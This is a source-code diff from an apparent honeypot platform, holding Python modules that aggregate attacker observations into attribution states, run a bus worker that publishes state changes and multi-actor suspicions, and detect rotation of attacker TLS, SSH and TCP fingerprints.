    worker composes the final dict for ``upsert_attribution_state``
    by adding ``identity_uuid`` + ``primitive`` (the merger does not
    own the natural key) and a ``last_change_ts`` derived from the
    prior row.

    Instances are immutable (``frozen=True``).
    """

    # Value surfaced for the primitive. Depends on the merger: the last raw
    # value or the recent-window majority value (categorical), the recent
    # EWMA (numeric), the most recent hash (hash), or None for empty input.
    current_value: Any
    # One of "unknown", "stable", "drifting", "conflicted", "multi_actor".
    state: str
    # Merger-specific score; the mergers in this module emit 0.0 .. 1.0.
    confidence: float
    # Total number of observations handed to the merger (not the window size).
    observation_count: int
    # ``ts`` of the last observation in the input; 0.0 when absent or empty.
    last_observation_ts: float
|
||||
|
||||
|
||||
def aggregate_observations(
    observations: Sequence[dict[str, Any]],
    *,
    value_kind: str | None = None,
) -> AttributionState:
    """Dispatch *observations* to the merger matching *value_kind*.

    *observations* is a sequence of dicts for one ``(identity,
    primitive)`` pair; the mergers read each dict's ``value`` and
    ``ts`` keys and treat the last element as the most recent
    observation.

    *value_kind* selects the merger:

    * ``None`` or ``"categorical"`` → :func:`aggregate_categorical`
    * ``"numeric"`` → :func:`aggregate_numeric`
    * ``"hash"`` → :func:`aggregate_hash`

    Empty input short-circuits to an ``unknown`` state with a zero
    count before *value_kind* is inspected, so an unrecognised kind
    only raises when there is something to merge.

    Raises:
        ValueError: *value_kind* is not one of the values above and
            *observations* is non-empty.
    """
    if not observations:
        return _unknown(0.0, count=0)

    if value_kind in (None, "categorical"):
        merger = aggregate_categorical
    elif value_kind == "numeric":
        merger = aggregate_numeric
    elif value_kind == "hash":
        merger = aggregate_hash
    else:
        raise ValueError(
            f"aggregate_observations: unknown value_kind={value_kind!r}; "
            "expected 'categorical' | 'numeric' | 'hash' | None",
        )
    return merger(observations)
|
||||
|
||||
|
||||
def aggregate_numeric(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Numeric merger for primitives whose ``value`` is an int / float.

    The last ``CATEGORICAL_WINDOW_N`` observations form the recent
    window and the ``CATEGORICAL_WINDOW_N`` before them the older
    window. Values are coerced with :func:`_safe_float`; each window
    is smoothed with an EWMA (``NUMERIC_EWMA_ALPHA``) and the recent
    window's dispersion is its coefficient of variation around that
    EWMA. Branches are evaluated in this order:

    1. fewer than ``MIN_OBSERVATIONS_FOR_STATE`` observations →
       ``unknown`` (confidence 0.0; value is the last observation
       coerced to float, or ``None`` on empty input)
    2. recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` →
       ``conflicted`` with a fixed confidence of 0.5
    3. an older window exists and the relative shift between the two
       EWMAs is >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
    4. otherwise → ``stable``

    For ``drifting`` / ``stable`` the confidence is
    ``1 - min(CV, 1.0)`` clamped at 0. Outside the ``unknown`` branch
    ``current_value`` is the recent EWMA rather than the last raw
    sample. This merger never emits ``multi_actor``.
    """
    total = len(observations)
    newest_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0

    def _result(value: Any, state: str, confidence: float) -> AttributionState:
        # Count and timestamp are identical on every exit path.
        return AttributionState(
            current_value=value,
            state=state,
            confidence=confidence,
            observation_count=total,
            last_observation_ts=newest_ts,
        )

    if total < _T.MIN_OBSERVATIONS_FOR_STATE:
        newest_value = (
            _safe_float(observations[-1].get("value")) if total else None
        )
        return _result(newest_value, "unknown", 0.0)

    span = _T.CATEGORICAL_WINDOW_N
    recent_vals = [_safe_float(o.get("value")) for o in observations[-span:]]
    older_vals = [
        _safe_float(o.get("value")) for o in observations[-2 * span: -span]
    ]
    recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
    recent_cv = _coef_of_variation(recent_vals, recent_mean)

    # Dispersion is checked before drift: a wildly scattered recent window
    # is reported as conflicted even if its mean also moved.
    if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
        return _result(recent_mean, "conflicted", 0.5)

    tightness = max(0.0, 1.0 - min(recent_cv, 1.0))
    shifted = False
    if older_vals:
        older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
        # A zero baseline would divide by zero; fall back to an absolute shift.
        baseline = abs(older_mean) if older_mean != 0 else 1.0
        relative_shift = abs(recent_mean - older_mean) / baseline
        shifted = relative_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT

    return _result(recent_mean, "drifting" if shifted else "stable", tightness)
|
||||
|
||||
|
||||
def aggregate_hash(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Hash merger for fingerprint-style primitives.

    Hashes are never recomputed here. The merger looks at the
    observations whose ``ts`` lies within ``HASH_DRIFT_WINDOW_SECS``
    of the last observation's ``ts`` and counts the distinct
    non-``None`` values among them; ``rotations`` is that count minus
    one (floored at 0), so returning to a previously seen hash does
    not add a rotation.

    * 0 rotations → ``stable``
    * 1 .. ``HASH_DRIFT_MAX`` rotations → ``drifting``
    * more than ``HASH_DRIFT_MAX`` rotations → ``conflicted``

    Empty input is the only path to ``unknown``; a single observation
    is already reported as ``stable``. ``current_value`` is the last
    observation's value and confidence is ``1 / (1 + rotations)``.
    """
    total = len(observations)
    if total == 0:
        return _unknown(0.0, count=0)

    newest = observations[-1]
    newest_ts = float(newest.get("ts", 0.0))
    newest_hash = newest.get("value")

    cutoff = newest_ts - _T.HASH_DRIFT_WINDOW_SECS
    windowed = [
        obs for obs in observations if float(obs.get("ts", 0.0)) >= cutoff
    ]
    hashes = {obs.get("value") for obs in windowed}
    hashes.discard(None)  # missing values are not a fingerprint
    rotations = max(0, len(hashes) - 1)

    if not rotations:
        verdict = "stable"
    elif rotations > _T.HASH_DRIFT_MAX:
        verdict = "conflicted"
    else:
        verdict = "drifting"

    return AttributionState(
        current_value=newest_hash,
        state=verdict,
        confidence=1.0 / (1.0 + rotations),
        observation_count=total,
        last_observation_ts=newest_ts,
    )
|
||||
|
||||
|
||||
def _ewma(values: Sequence[float], alpha: float) -> float:
|
||||
"""Single-pass EWMA. Empty input is illegal; callers gate on
|
||||
``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
|
||||
it = iter(values)
|
||||
smoothed = next(it)
|
||||
for v in it:
|
||||
smoothed = alpha * v + (1.0 - alpha) * smoothed
|
||||
return smoothed
|
||||
|
||||
|
||||
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
|
||||
"""Population-style CV = stdev / |mean|. Returns 0 on a constant
|
||||
signal; returns +inf-equivalent (1e9) when the mean is exactly
|
||||
zero and the signal isn't constant — so the conflicted threshold
|
||||
fires without us having to special-case it upstream."""
|
||||
if not values:
|
||||
return 0.0
|
||||
diffs_sq = [(v - mean) ** 2 for v in values]
|
||||
variance = sum(diffs_sq) / len(values)
|
||||
stdev = variance ** 0.5
|
||||
if mean == 0:
|
||||
return 0.0 if stdev == 0 else 1e9
|
||||
return stdev / abs(mean)
|
||||
|
||||
|
||||
def _safe_float(value: Any) -> float:
|
||||
"""Defensive coercion — observations may carry value=None on
|
||||
unknown-emitter primitives. Treat None as 0.0; the dispersion
|
||||
check will surface the resulting flat baseline as 'stable'
|
||||
which is the honest answer for a single-observation primitive
|
||||
that hasn't fired yet."""
|
||||
if value is None:
|
||||
return 0.0
|
||||
if isinstance(value, bool):
|
||||
return 1.0 if value else 0.0
|
||||
return float(value)
|
||||
|
||||
|
||||
def aggregate_categorical(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Categorical merger — the dominant case for BEHAVE-SHELL.

    Compares the most recent ``CATEGORICAL_WINDOW_N`` observations
    with the ``CATEGORICAL_WINDOW_N`` before them. A window is
    "clear" when its most common value occurs at least
    ``min(CATEGORICAL_MAJORITY_THRESHOLD, window size)`` times, so a
    window shorter than the threshold must be unanimous.

    * empty input → ``unknown`` with a zero count (same result as
      :func:`aggregate_observations` and :func:`aggregate_hash`)
    * fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
    * recent window not clear + alternation pattern → ``multi_actor``
    * recent window not clear, no alternation → ``conflicted``
    * recent window clear, no older window → ``stable``
    * recent window clear, older window not clear or clear on a
      different value → ``drifting``
    * recent window clear and older window clear on the same value →
      ``stable``

    Confidence is the recent-window agreement ratio (``0.0`` for
    ``unknown``); for ``multi_actor`` it is capped at
    ``MULTI_ACTOR_MAX_CONFIDENCE``. ``current_value`` is the last
    observation's value for ``unknown`` / ``conflicted`` /
    ``multi_actor`` and the recent majority value for ``stable`` /
    ``drifting``.
    """
    n = len(observations)
    if n == 0:
        # Public entry point: indexing observations[-1] on empty input
        # would raise IndexError, unlike the numeric and hash mergers.
        return _unknown(0.0, count=0)

    last_ts = float(observations[-1].get("ts", 0.0))
    last_value = observations[-1].get("value")

    def _state(value: Any, state: str, confidence: float) -> AttributionState:
        # Count and timestamp are identical on every exit path.
        return AttributionState(
            current_value=value,
            state=state,
            confidence=confidence,
            observation_count=n,
            last_observation_ts=last_ts,
        )

    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
        return _state(last_value, "unknown", 0.0)

    window = _T.CATEGORICAL_WINDOW_N
    recent_values = [o.get("value") for o in observations[-window:]]
    top_value, top_count = Counter(recent_values).most_common(1)[0]
    recent_size = len(recent_values)
    confidence = top_count / recent_size

    if top_count < min(_T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size):
        # Split recent window: tell two-value alternation (multi_actor)
        # apart from plain disagreement.
        if _is_alternation(observations):
            return _state(
                last_value,
                "multi_actor",
                min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
            )
        return _state(last_value, "conflicted", confidence)

    # Recent window has a clear majority; the prior window decides
    # between stable and drifting.
    older_values = [o.get("value") for o in observations[-2 * window: -window]]
    if not older_values:
        # At most one window's worth of data, so there is no baseline
        # to drift away from.
        return _state(top_value, "stable", confidence)

    older_top_value, older_top_count = Counter(older_values).most_common(1)[0]
    older_clear = older_top_count >= min(
        _T.CATEGORICAL_MAJORITY_THRESHOLD, len(older_values),
    )
    # Either the older window was itself split (the behaviour has only
    # just converged) or it was clear on a different value: both are drift.
    if not older_clear or older_top_value != top_value:
        return _state(top_value, "drifting", confidence)
    return _state(top_value, "stable", confidence)
|
||||
|
||||
|
||||
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
    """Report whether the recent window flips between exactly two values.

    Only the last ``CATEGORICAL_WINDOW_N`` observations are examined.
    The check is deliberately conservative and returns ``True`` only
    when all of the following hold:

    * the window holds at least 4 observations,
    * it contains exactly 2 distinct values, and
    * adjacent-pair flips are at least twice the adjacent-pair
      repeats (with repeats counted as at least 1).
    """
    tail = observations[-_T.CATEGORICAL_WINDOW_N:]
    if len(tail) < 4:
        return False

    seq = [o.get("value") for o in tail]
    if len(set(seq)) != 2:
        return False

    flips = sum(1 for prev, cur in zip(seq, seq[1:]) if cur != prev)
    repeats = (len(seq) - 1) - flips
    return flips >= 2 * max(repeats, 1)
|
||||
|
||||
|
||||
def _unknown(last_ts: float, *, count: int) -> AttributionState:
    """Build the ``unknown`` state: no value, zero confidence.

    *last_ts* and *count* are passed through as
    ``last_observation_ts`` and ``observation_count``.
    """
    return AttributionState(
        state="unknown",
        current_value=None,
        confidence=0.0,
        last_observation_ts=last_ts,
        observation_count=count,
    )
|
||||
@@ -1,394 +0,0 @@
|
||||
"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
|
||||
|
||||
Subscribes to ``attacker.observation.>`` and, for each event, ensures
|
||||
the source attacker has a stub identity in ``attacker_identities``.
|
||||
Phase 1 does **not** invoke the merger or write
|
||||
``attribution_state`` rows; that wiring lands in Phase 4 once the
|
||||
Phase 2/3 mergers are in.
|
||||
|
||||
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
|
||||
with a wake event, fall back to poll-only if the bus is unavailable,
|
||||
publish derived events with :func:`publish_safely`, log per-handler
|
||||
exceptions and continue.
|
||||
|
||||
Trigger isolation: the per-event handler is wrapped in a single
|
||||
try/except. Any exception is logged and the loop continues with the
|
||||
next event. This is the same posture BEHAVE-SHELL's
|
||||
``_handler.handle_session_ended`` adopts.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import (
|
||||
publish_safely,
|
||||
run_control_listener_signal as _run_control_listener_signal,
|
||||
run_health_heartbeat as _run_health_heartbeat,
|
||||
)
|
||||
from decnet.correlation.attribution import _thresholds as _T
|
||||
from decnet.correlation.attribution.aggregate import aggregate_observations
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
# ``behave_shell`` is treated as optional: when the import fails the names
# are bound to empty placeholders and the flag records that the registry
# is unavailable, so this module still imports.
try:
    from behave_shell.spec import (
        PRIMITIVE_REGISTRY,
        ValueKind,
    )
    _BEHAVE_REGISTRY_AVAILABLE = True
except ImportError:  # pragma: no cover
    PRIMITIVE_REGISTRY = {}
    ValueKind = None
    _BEHAVE_REGISTRY_AVAILABLE = False
|
||||
|
||||
log = get_logger("correlation.attribution_worker")
|
||||
|
||||
_WORKER_NAME = "attribution"
|
||||
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
|
||||
|
||||
|
||||
async def run_attribution_loop(
    repo: BaseRepository,
    *,
    shutdown: asyncio.Event | None = None,
    multi_actor_tick_secs: float | None = None,
) -> None:
    """Run the attribution worker until cancelled.

    Connects to the bus and starts four background tasks:

    1. ``_consume_observations`` — bus subscription on
       ``attacker.observation.>``; dispatches each event to
       :func:`handle_observation_event`.
    2. ``_multi_actor_tick_loop`` — periodic walk driven by
       *tick_secs* (Phase 5 multi-actor correlator).
    3. Health heartbeat for this worker name.
    4. Control listener for this worker name.

    The coroutine then blocks on *shutdown* and, on the way out,
    cancels and awaits every task that was started and closes the bus.

    *shutdown* is an optional external stop signal; when omitted a
    private event is created that nothing sets, so only cancellation
    ends the wait.
    *multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
    (tests use this to drive the correlator without sleeping for a
    minute).
    """
    log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)

    bus: BaseBus | None = None
    sub_task: asyncio.Task | None = None
    tick_task: asyncio.Task | None = None
    heartbeat_task: asyncio.Task | None = None
    control_task: asyncio.Task | None = None
    tick_secs = (
        multi_actor_tick_secs
        if multi_actor_tick_secs is not None
        else _T.MULTI_ACTOR_TICK_SECS
    )
    try:
        candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
        await candidate.connect()
        # Only publish the bus to the outer scope once connect() succeeded,
        # so the teardown below never closes a half-connected client.
        bus = candidate
        sub_task = asyncio.create_task(
            _consume_observations(bus, repo),
        )
        tick_task = asyncio.create_task(
            _multi_actor_tick_loop(bus, repo, tick_secs),
        )
        heartbeat_task = asyncio.create_task(
            _run_health_heartbeat(bus, _WORKER_NAME),
        )
        control_task = asyncio.create_task(
            _run_control_listener_signal(bus, _WORKER_NAME),
        )
    except Exception as exc:  # noqa: BLE001
        # NOTE(review): the message says "idle until bus returns", but no
        # reconnect attempt is visible in this function — confirm that a
        # restart by the supervisor is the intended recovery path.
        log.warning(
            "attribution worker: bus unavailable, idle until bus returns: %s",
            exc,
        )

    if shutdown is None:
        shutdown = asyncio.Event()

    try:
        await shutdown.wait()
    except (asyncio.CancelledError, KeyboardInterrupt):
        # NOTE(review): cancellation is logged and not re-raised here, so
        # the coroutine returns normally after teardown — confirm intended.
        log.info("attribution worker stopped")
    finally:
        for task in (sub_task, tick_task, heartbeat_task, control_task):
            if task is None:
                continue
            task.cancel()
            # Await each cancelled task so it finishes unwinding; its
            # CancelledError (or any late failure) is deliberately dropped.
            with contextlib.suppress(asyncio.CancelledError, Exception):
                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
|
||||
|
||||
|
||||
async def _consume_observations(
    bus: BaseBus, repo: BaseRepository,
) -> None:
    """Drain the observation subscription and dispatch every event.

    Subscribes to ``_OBSERVATION_PATTERN`` and passes each received event
    to :func:`handle_observation_event`.

    A handler failure is logged with its traceback and the loop moves on
    to the next event. Any other exception that ends the subscription is
    logged as a warning and the coroutine returns. Cancellation is
    re-raised to the caller.
    """

    async def _dispatch(event) -> None:
        # One bad payload must not tear down the whole subscription.
        try:
            await handle_observation_event(bus, repo, event)
        except Exception:  # noqa: BLE001
            log.exception("attribution worker: handler failed")

    try:
        subscription = bus.subscribe(_OBSERVATION_PATTERN)
        async with subscription:
            async for event in subscription:
                await _dispatch(event)
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "attribution worker: subscriber for %s died (%s)",
            _OBSERVATION_PATTERN, exc,
        )
|
||||
|
||||
|
||||
async def handle_observation_event(
    bus: BaseBus | None,
    repo: BaseRepository,
    event: Any,
) -> None:
    """Fold one ``attacker.observation.<primitive>`` event into attribution state.

    The handler:

    1. reads ``attacker_uuid`` and ``primitive`` from the payload and
       skips the event when either is missing or empty;
    2. resolves the identity through
       ``repo.ensure_stub_identity_for_attacker`` and returns when that
       yields ``None``;
    3. loads the observation series for ``(identity, primitive)`` and
       returns when it is empty;
    4. aggregates the series with the merger kind chosen by
       :func:`_value_kind_for`;
    5. upserts the resulting row, keeping the stored ``last_change_ts``
       while the state is unchanged;
    6. publishes the ``ATTRIBUTION_PROFILE_STATE_CHANGED`` event when the
       state differs from the stored one (or no row existed) and a bus
       is available.

    Args:
        bus: Bus used to publish the transition event; ``None`` disables
            publishing.
        repo: Repository providing identity, observation and
            attribution-state access.
        event: An object exposing a ``payload`` dict, or the payload dict
            itself (see :func:`_payload_of`).
    """
    payload = _payload_of(event)
    attacker_uuid = payload.get("attacker_uuid")
    primitive = payload.get("primitive")
    if not attacker_uuid or not primitive:
        log.debug(
            "attribution worker: skipping malformed event (uuid=%r primitive=%r)",
            attacker_uuid, primitive,
        )
        return

    identity_uuid = await repo.ensure_stub_identity_for_attacker(
        str(attacker_uuid),
    )
    if identity_uuid is None:
        log.info(
            "attribution worker: no Attacker row for uuid=%s yet; deferring",
            attacker_uuid,
        )
        return
    primitive_str = str(primitive)

    # Load the full per-(identity, primitive) observation series.
    observations = await repo.observations_for_identity_primitive(
        identity_uuid, primitive_str,
    )
    if not observations:
        log.debug(
            "attribution worker: no observations yet for identity=%s "
            "primitive=%s (race with upsert)",
            identity_uuid, primitive_str,
        )
        return

    # Run merger.
    value_kind = _value_kind_for(primitive_str)
    new_state = aggregate_observations(observations, value_kind=value_kind)

    # Load prior state to detect transitions.
    prior = await repo.get_attribution_state(identity_uuid, primitive_str)
    state_changed = prior is None or prior.get("state") != new_state.state

    # Persist. last_change_ts is carried over from the prior row while the
    # state is unchanged, so it does not reset on every observation.
    if prior is not None and not state_changed:
        # ``.get(key, default)`` does not cover a key that is present but
        # holds ``None``; fall back explicitly so ``float(None)`` cannot
        # raise.
        prior_change_ts = prior.get("last_change_ts")
        last_change_ts = float(
            new_state.last_observation_ts
            if prior_change_ts is None
            else prior_change_ts
        )
    else:
        last_change_ts = new_state.last_observation_ts
    await repo.upsert_attribution_state({
        "identity_uuid": identity_uuid,
        "primitive": primitive_str,
        "current_value": new_state.current_value,
        "state": new_state.state,
        "confidence": new_state.confidence,
        "observation_count": new_state.observation_count,
        "last_change_ts": last_change_ts,
        "last_observation_ts": new_state.last_observation_ts,
    })

    # Emit state_changed only on transition: re-running over the same
    # observations yields the same merger output and therefore no event.
    if state_changed and bus is not None:
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
            {
                "identity_uuid": identity_uuid,
                "primitive": primitive_str,
                "old_state": prior.get("state") if prior else None,
                "new_state": new_state.state,
                "current_value": new_state.current_value,
                "confidence": new_state.confidence,
                "observation_count": new_state.observation_count,
                "ts": new_state.last_observation_ts,
            },
            event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
        )
        log.info(
            "attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
            identity_uuid, primitive_str,
            (prior or {}).get("state") or "<new>", new_state.state,
            new_state.confidence,
        )
|
||||
|
||||
|
||||
def _value_kind_for(primitive: str) -> str:
    """Map a primitive name to the merger tag used for aggregation.

    Looks the primitive up in ``PRIMITIVE_REGISTRY`` and translates its
    ``kind``:

    * ``ValueKind.NUMERIC`` → ``"numeric"``
    * ``ValueKind.HASH`` → ``"hash"``
    * any other kind → ``"categorical"``

    ``"categorical"`` is also returned when the registry is unavailable,
    when the primitive is not registered, or when ``ValueKind`` is
    ``None``.
    """
    # Only touch the registry when it was importable.
    spec = PRIMITIVE_REGISTRY.get(primitive) if _BEHAVE_REGISTRY_AVAILABLE else None
    if spec is None or ValueKind is None:
        return "categorical"

    kind = spec.kind
    if kind is ValueKind.NUMERIC:
        return "numeric"
    return "hash" if kind is ValueKind.HASH else "categorical"
|
||||
|
||||
|
||||
def _payload_of(event: Any) -> dict[str, Any]:
|
||||
"""Extract the dict payload from a BusEvent or fall through if
|
||||
*event* is already a dict (test fixtures may pass either)."""
|
||||
payload = getattr(event, "payload", event)
|
||||
return payload if isinstance(payload, dict) else {}
|
||||
|
||||
|
||||
async def _multi_actor_tick_loop(
    bus: BaseBus, repo: BaseRepository, interval_secs: float,
) -> None:
    """Run :func:`tick_multi_actor` forever, pausing *interval_secs* between passes.

    A single in-memory dedupe map (identity_uuid → frozenset of
    primitives) is created here and handed to every tick, so it lives
    for as long as this coroutine does and starts empty on each start.

    A failing tick is logged with its traceback and the loop carries on
    after the usual sleep. The loop ends only through cancellation,
    which propagates to the caller.
    """
    fired_signatures: dict[str, frozenset[str]] = {}
    while True:
        try:
            await tick_multi_actor(bus, repo, fired_signatures)
        except Exception:  # noqa: BLE001
            log.exception("attribution worker: multi_actor tick failed")
        await asyncio.sleep(interval_secs)
|
||||
|
||||
|
||||
async def tick_multi_actor(
    bus: BaseBus | None,
    repo: BaseRepository,
    last_fired: dict[str, frozenset[str]],
) -> int:
    """Run one pass of the cross-primitive correlator. Public for tests.

    For every entry from ``repo.list_multi_actor_identities()`` with at
    least ``MULTI_ACTOR_MIN_PRIMITIVES`` primitives, the primitive set is
    compared with the one recorded in *last_fired*. A new or changed set
    is recorded and, when *bus* is not ``None``, published as an
    ``ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED`` event.

    Identities that no longer qualify — absent from the repo result or
    below the threshold — are removed from *last_fired* so that a later
    qualifying set fires again.

    Args:
        bus: Bus to publish on; ``None`` records signatures without
            publishing.
        repo: Repository providing ``list_multi_actor_identities``.
        last_fired: Dedupe map (identity_uuid → frozenset of primitives),
            mutated in place.

    Returns:
        The number of events published during this pass.
    """
    candidates = await repo.list_multi_actor_identities()
    fired = 0
    qualifying: set[str] = set()
    for entry in candidates:
        identity_uuid = str(entry["identity_uuid"])
        primitives: list[str] = sorted(entry.get("primitives") or [])
        if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
            # Below the threshold: deliberately NOT marked as qualifying,
            # so any previous signature is dropped below and the identity
            # re-arms.
            continue
        qualifying.add(identity_uuid)
        signature = frozenset(primitives)
        if last_fired.get(identity_uuid) == signature:
            continue
        last_fired[identity_uuid] = signature
        if bus is None:
            continue
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
            {
                "identity_uuid": identity_uuid,
                "primitives": primitives,
                "evidence_summary": (
                    f"{len(primitives)} primitives flagged multi_actor"
                ),
                "confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
                "ts": _now(),
            },
            event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
        )
        fired += 1
        log.info(
            "attribution worker: multi_actor_suspected identity=%s primitives=%s",
            identity_uuid, primitives,
        )
    # Re-arm: forget every identity that did not qualify in this pass.
    for stale in [key for key in last_fired if key not in qualifying]:
        del last_fired[stale]
    return fired
|
||||
|
||||
|
||||
def _now() -> float:
|
||||
"""Wall-clock seconds. Wrapped so tests can monkeypatch."""
|
||||
import time
|
||||
return time.time()
|
||||
|
||||
|
||||
__all__ = [
|
||||
"run_attribution_loop",
|
||||
"handle_observation_event",
|
||||
"tick_multi_actor",
|
||||
]
|
||||
@@ -1,153 +0,0 @@
|
||||
"""Attacker substrate-fingerprint rotation detection.
|
||||
|
||||
Called inline from the prober at each fingerprint emit site. Looks up
|
||||
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
|
||||
when the new hash differs from the last one, emits a derived
|
||||
``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
|
||||
stamps the ``Attacker`` row's rotation telemetry.
|
||||
|
||||
This is a pure library — no daemon, no async loop. The prober is the
|
||||
only producer. We just teach it to derive a second event on hash
|
||||
flip without standing up another worker (DEBT-032).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import uuid as _uuid
|
||||
from dataclasses import dataclass
|
||||
from datetime import datetime
|
||||
from typing import Any, Callable, Literal
|
||||
|
||||
from sqlmodel import Session, select
|
||||
|
||||
from decnet.web.db.models import Attacker, AttackerFingerprintState
|
||||
|
||||
ProbeType = Literal["jarm", "hassh", "tcpfp"]
|
||||
RotationKind = Literal[
|
||||
"no_attacker_row", # caller raced ahead of correlator; skip silently
|
||||
"first_sighting", # state row created, no prior hash
|
||||
"unchanged", # same hash as last sighting
|
||||
"rotated", # hash differs; event emitted, Attacker stamped
|
||||
]
|
||||
|
||||
PublishFn = Callable[[str, dict[str, Any]], None]
|
||||
SyslogFn = Callable[[str, dict[str, Any]], None]
|
||||
|
||||
|
||||
@dataclass
class RotationOutcome:
    """Return shape of :func:`record_fingerprint`. Caller usually
    ignores it; useful for tests + tracing."""
    # Which branch record_fingerprint took (see ``RotationKind``).
    kind: RotationKind
    # Hash stored before this call; ``None`` for "no_attacker_row" and
    # "first_sighting", where no prior hash exists.
    old_hash: str | None
    # Hash passed to record_fingerprint for this sighting.
    new_hash: str
    # Rotation counter of the state row; 0 for "no_attacker_row" and
    # "first_sighting".
    rotation_count: int
|
||||
|
||||
|
||||
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
|
||||
|
||||
|
||||
def record_fingerprint(
    session: Session,
    *,
    attacker_ip: str,
    port: int,
    probe_type: ProbeType,
    new_hash: str,
    ts: datetime,
    publish_fn: PublishFn | None = None,
    syslog_fn: SyslogFn | None = None,
) -> RotationOutcome:
    """Record a fingerprint sighting and report whether the hash rotated.

    The attacker is looked up by ``attacker_ip``; the state row is keyed
    on ``(attacker.uuid, port, probe_type)``. Four outcomes are possible:

    * ``"no_attacker_row"`` — no ``Attacker`` matches the IP; nothing is
      written.
    * ``"first_sighting"`` — no state row existed; one is created and
      committed.
    * ``"unchanged"`` — the stored hash equals *new_hash*; only
      ``last_seen`` is refreshed and committed.
    * ``"rotated"`` — the hash differs; the state row and the attacker's
      rotation telemetry are updated, the derived event is handed to
      *publish_fn* and then *syslog_fn* (when given), and finally the
      session is committed.

    Note that on rotation the callbacks run *before* the commit, so an
    exception from either callback leaves the changes uncommitted.

    Args:
        session: Open SQLModel session; this function commits on it.
        attacker_ip: Source IP used to resolve the ``Attacker`` row.
        port: Probed port.
        probe_type: Fingerprint family.
        new_hash: Hash observed in this sighting.
        ts: Timestamp of the sighting.
        publish_fn: Optional callback receiving ``(event_type, payload)``.
        syslog_fn: Optional callback receiving ``(event_type, payload)``.

    Returns:
        A :class:`RotationOutcome` describing the branch taken.
    """

    def _outcome(kind, old_hash, rotation_count) -> RotationOutcome:
        # new_hash is the same in every outcome; close over it.
        return RotationOutcome(
            kind=kind,
            old_hash=old_hash,
            new_hash=new_hash,
            rotation_count=rotation_count,
        )

    attacker_query = select(Attacker).where(Attacker.ip == attacker_ip)
    attacker = session.exec(attacker_query).first()
    if attacker is None:
        return _outcome("no_attacker_row", None, 0)

    state_query = select(AttackerFingerprintState).where(
        AttackerFingerprintState.attacker_uuid == attacker.uuid,
        AttackerFingerprintState.port == port,
        AttackerFingerprintState.probe_type == probe_type,
    )
    state = session.exec(state_query).first()

    if state is None:
        fresh_state = AttackerFingerprintState(
            uuid=str(_uuid.uuid4()),
            attacker_uuid=attacker.uuid,
            port=port,
            probe_type=probe_type,
            last_hash=new_hash,
            last_seen=ts,
            rotation_count=0,
        )
        session.add(fresh_state)
        session.commit()
        return _outcome("first_sighting", None, 0)

    if state.last_hash == new_hash:
        state.last_seen = ts
        session.add(state)
        session.commit()
        return _outcome("unchanged", state.last_hash, state.rotation_count)

    # Hash flipped: advance the per-(port, probe) state row ...
    previous_hash = state.last_hash
    state.last_hash = new_hash
    state.last_seen = ts
    state.rotation_count += 1
    session.add(state)

    # ... and stamp the attacker-level rotation telemetry.
    attacker.rotation_count += 1
    attacker.last_rotation_at = ts
    session.add(attacker)

    payload: dict[str, Any] = {
        "attacker_uuid": attacker.uuid,
        "attacker_ip": attacker_ip,
        "port": port,
        "probe_type": probe_type,
        "old_hash": previous_hash,
        "new_hash": new_hash,
        "rotation_count": state.rotation_count,
        "ts": ts.isoformat(),
    }

    # Bus first, then syslog; either may be absent.
    for emit in (publish_fn, syslog_fn):
        if emit is not None:
            emit(_ROTATED_EVENT_TYPE, payload)

    session.commit()

    return _outcome("rotated", previous_hash, state.rotation_count)
|
||||
@@ -32,21 +32,6 @@ _RFC5424_RE = re.compile(
|
||||
r"(.+)$", # 5: SD element + optional MSG
|
||||
)
|
||||
|
||||
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
|
||||
# Docker-stdout collector envelope wraps the inner ``logger
|
||||
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
|
||||
